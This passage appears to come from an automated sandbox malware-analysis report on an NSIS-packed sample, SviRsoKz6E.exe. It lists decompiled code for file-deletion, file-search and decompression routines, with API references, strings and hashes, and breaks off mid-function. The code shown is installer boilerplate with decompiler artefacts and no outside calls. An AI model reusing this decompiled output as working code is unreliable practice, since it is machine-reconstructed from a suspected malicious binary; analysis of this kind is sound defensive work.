                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                  • String ID: "$"C:\Users\user\Desktop\SviRsoKz6E.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SviRsoKz6E.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                  • API String ID: 1314998376-3462530929
                  • Opcode ID: 3a05b18f0ec8be13621353082a85ed6cdf7c78c1073b2f5caca5b5155c70698e
                  • Instruction ID: fed38e33bd1ad5050a1aac335cdd74565c3a3e786a0889b069c8e2b205acfbdc
                  • Opcode Fuzzy Hash: 3a05b18f0ec8be13621353082a85ed6cdf7c78c1073b2f5caca5b5155c70698e
                  • Instruction Fuzzy Hash: 7CC108702047406AD721AF759D49A2F3EACEF85306F45443FF581B62D2CB7C8A598B2E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405889, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00405889(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B47(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247c8 =  *0x4247c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060C1(0x421d30, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AA0(_t73);
					} else {
						lstrcatA(0x421d30, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d30,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405A84( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060C1(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405841(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E004051E8(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247c8 =  *0x4247c8 + 1;
										} else {
											E004051E8(0xfffffff1, _t73);
											E00405EA0(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405889(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d30 - 0x5c;
					if( *0x421d30 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406435(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A59(_t73);
							_t40 = E00405841(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E004051E8(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E004051E8(0xfffffff1, _t73);
							return E00405EA0(_t72, _t73, 0);
						}
						L33:
						 *0x4247c8 =  *0x4247c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                  0x00405893
                  0x00405898
                  0x004058a1
                  0x004058a4
                  0x004058ac
                  0x004058af
                  0x004058b2
                  0x004058ba
                  0x004058bc
                  0x004058bd
                  0x00000000
                  0x004058bd
                  0x004058c8
                  0x004058cb
                  0x004058cb
                  0x004058cb
                  0x004058cf
                  0x004058e2
                  0x004058e9
                  0x004058ee
                  0x004058f2
                  0x00405902
                  0x004058f4
                  0x004058fa
                  0x004058fa
                  0x00405907
                  0x0040590a
                  0x00405915
                  0x0040591b
                  0x00405920
                  0x00405930
                  0x00405932
                  0x00405938
                  0x0040593b
                  0x0040593e
                  0x004059f6
                  0x004059f6
                  0x004059fa
                  0x004059fc
                  0x004059fc
                  0x004059fc
                  0x004059fc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405944
                  0x00405944
                  0x0040594d
                  0x00405953
                  0x00405958
                  0x0040595b
                  0x0040595d
                  0x00405961
                  0x00405963
                  0x00405963
                  0x00405961
                  0x00405966
                  0x00405969
                  0x0040597c
                  0x0040597e
                  0x00405983
                  0x0040598a
                  0x004059a5
                  0x004059aa
                  0x004059ac
                  0x004059d0
                  0x004059ae
                  0x004059ae
                  0x004059b1
                  0x004059c5
                  0x004059b3
                  0x004059b6
                  0x004059be
                  0x004059be
                  0x004059b1
                  0x0040598c
                  0x00405992
                  0x00405994
                  0x0040599a
                  0x0040599a
                  0x00405994
                  0x00000000
                  0x0040598a
                  0x0040596b
                  0x0040596e
                  0x00405970
                  0x00000000
                  0x00000000
                  0x00405972
                  0x00405974
                  0x00000000
                  0x00000000
                  0x00405976
                  0x0040597a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004059d5
                  0x004059df
                  0x004059e5
                  0x004059e5
                  0x004059f0
                  0x00000000
                  0x004059f0
                  0x0040590c
                  0x00405913
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004058d1
                  0x004058d1
                  0x004058d3
                  0x00405a00
                  0x00405a02
                  0x00405a05
                  0x00405a56
                  0x00405a56
                  0x00405a56
                  0x00405a07
                  0x00405a0a
                  0x00405a15
                  0x00405a1a
                  0x00405a1c
                  0x00000000
                  0x00000000
                  0x00405a1f
                  0x00405a2b
                  0x00405a30
                  0x00405a32
                  0x00000000
                  0x00405a4d
                  0x00405a34
                  0x00405a37
                  0x00000000
                  0x00000000
                  0x00405a3c
                  0x00000000
                  0x00405a43
                  0x00405a0c
                  0x00405a0c
                  0x00000000
                  0x00405a0c
                  0x004058d9
                  0x004058dc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004058dc

                  APIs
                  • DeleteFileA.KERNELBASE(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                  • lstrcatA.KERNEL32(00421D30,\*.*,00421D30,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058FA
                  • lstrcatA.KERNEL32(?,0040A014,?,00421D30,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040591B
                  • lstrlenA.KERNEL32(?,?,0040A014,?,00421D30,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405921
                  • FindFirstFileA.KERNEL32(00421D30,?,?,?,0040A014,?,00421D30,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405932
                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059DF
                  • FindClose.KERNEL32(00000000), ref: 004059F0
                  Strings
                  • "C:\Users\user\Desktop\SviRsoKz6E.exe" , xrefs: 00405889
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405896
                  • \*.*, xrefs: 004058F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                  • String ID: "C:\Users\user\Desktop\SviRsoKz6E.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                  • API String ID: 2035342205-2787726349
                  • Opcode ID: 26995f6469efc0b5a60458e08d56de8dc590e27ec954537a62243d1abfa56489
                  • Instruction ID: 41c2b5987dba1b2e33ef8c3f02a16f7fa1ffbccb66a0b3bb43d54024ecdcecbe
                  • Opcode Fuzzy Hash: 26995f6469efc0b5a60458e08d56de8dc590e27ec954537a62243d1abfa56489
                  • Instruction Fuzzy Hash: 6251D070900A04EACB21AB618C89BBF7B78EF42724F54427BF851B51D1D73C4982DF6A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406435, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00406435(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422578); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422578;
			}




                  0x00406440
                  0x00406449
                  0x00000000
                  0x00406456
                  0x0040644c
                  0x00000000

                  APIs
                  • FindFirstFileA.KERNELBASE(74B5FA90,00422578,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,00405B8A,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406440
                  • FindClose.KERNEL32(00000000), ref: 0040644C
                  Strings
                  • x%B, xrefs: 00406436
                  • C:\Users\user\AppData\Local\Temp\nst2F82.tmp, xrefs: 00406435
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID: C:\Users\user\AppData\Local\Temp\nst2F82.tmp$x%B
                  • API String ID: 2295610775-273158025
                  • Opcode ID: f29c590cbb4ae7880d615934e2c411517b6bf54f8089bedae6efd123f54e346e
                  • Instruction ID: 161293881315f5638f8ce2083a4c9c3eaa4ca925c072cbf9d6c71a91d4c8f3d6
                  • Opcode Fuzzy Hash: f29c590cbb4ae7880d615934e2c411517b6bf54f8089bedae6efd123f54e346e
                  • Instruction Fuzzy Hash: FED01231944130ABC3502B386E0C85B7B599F153313A2CB36F56AF12F0CB788C6296AC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004067BE, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E004067BE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407061))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
